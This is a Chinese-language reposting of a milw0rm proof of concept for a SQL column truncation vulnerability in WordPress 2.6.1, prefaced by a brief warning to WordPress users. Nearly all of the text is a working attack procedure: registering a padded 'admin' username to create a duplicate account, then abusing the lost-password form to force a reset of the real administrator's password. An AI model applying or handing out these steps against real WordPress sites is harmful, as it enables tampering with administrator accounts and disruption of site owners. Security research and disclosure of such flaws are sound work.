WordPress 2.6.1 SQL Column Truncation Vulnerability
WordPress 2.6.1 SQL Column Truncation Vulnerability
发布时间:2016-12-21 来源:查字典编辑
摘要:用wordpress的要注意了#WordPress2.6.1SQLColumnTruncationVulnerability(PoC)##f...

用wordpress的要注意了 # WordPress 2.6.1 SQL Column Truncation Vulnerability (PoC)

#

# found by irk4z[at]yahoo.pl

# homepage: http://irk4z.wordpress.com/

#

# this is not critical vuln [;

#

# first, read this discovery:

# http://www.suspekt.org/2008/08/18/mysql-and-sql-column-truncation-vulnerabilities/

#

# in this hack we can remote change admin password, if registration enabled

#

# greets: Stefan Esser, Lukasz Pilorz, cOndemned, tbh, sid.psycho, str0ke and all fiends 1. go to url: server.com/wp-login.php?action=register 2. register as: login: admin x

email: your email^ admin[55 space chars]x now, we have duplicated 'admin' account in database 3. go to url: server.com/wp-login.php?action=lostpassword 4. write your email into field and submit this form 5. check your email and go to reset confirmation link 6. admin's password changed, but new password will be send to correct admin email ;/ # milw0rm.com

推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
相关阅读
网友关注
最新黑客教程学习
热门黑客教程学习
网络安全子分类